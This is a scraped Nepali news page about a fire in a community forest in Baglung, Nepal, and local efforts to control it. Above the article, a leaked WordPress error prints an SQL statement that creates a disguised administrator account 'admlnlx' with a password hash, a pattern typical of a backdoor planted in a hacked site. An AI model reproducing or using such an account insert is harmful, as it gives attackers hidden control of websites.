WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzsOdYXI5.txa57U8RN1SjQQQLKdRF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 09:27:03', '', 'admlnlx', 'admlnlx')

सामुदायिक वनमा आगलागी, स्थानीयवासी चिन्तित – Gaule Khabar

सामुदायिक वनमा आगलागी, स्थानीयवासी चिन्तित

सामुदायिक वनमा आगलागी, स्थानीयवासी चिन्तित

बलेवा । बागलुङको काँठेखोला गाउँपालिका–३ धम्जास्थित माझकटेरी सामुदायिक वनमा आगलागी भएको छ ।

आज दिउँसो २ बजेदेखि लागेको आगो नियन्त्रणका लागि स्थानीयवासीले प्रयास गरेको भएता पनि अझै नियन्त्रणमा आउन नसकेको धम्जाका स्थानीयवासी बाबुराम भण्डारीले जानकारी दिए । सामुदायिक वनमा लागेको आगो बस्तीको नजिक आउन थालेपछि स्थानीयवासी चिन्तित छन् । जङ्गलमा रहेका हजारौँ बन्यजन्तु तथा पक्षी मरेको हुनसक्ने आँकलन उहाँले गर्नुभयो । लामो समय सरसफाइ नभएको सामुदायिक वनमा ढलेका ठूला रुख रहेकाले आगो लामो समय रहनसक्ने र अन्यत्र फैलिने त्रास बढेको छ ।

स्थानीयवासीको प्रयासमा आगो नियन्त्रणमा आउन नसकेपछि सशत्र प्रहरीका रामबहादुर केसीको नेतृत्वमा विपत् व्यवस्थापनको टोली धम्जामा पुगेको र स्थानीयवासीको सहयोगमा नियन्त्रणको प्रयास गरिएको उहाँले बताउनुभयो । आगो कसले लगाएको हो भन्ने बारेमा अनुसन्धान भैरहेको र काँठेखोला गाउँपालिका–२ भिमापोखराको जङ्गलमा पनि क्षति पुर्‍यएको उहाको भनाइ छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका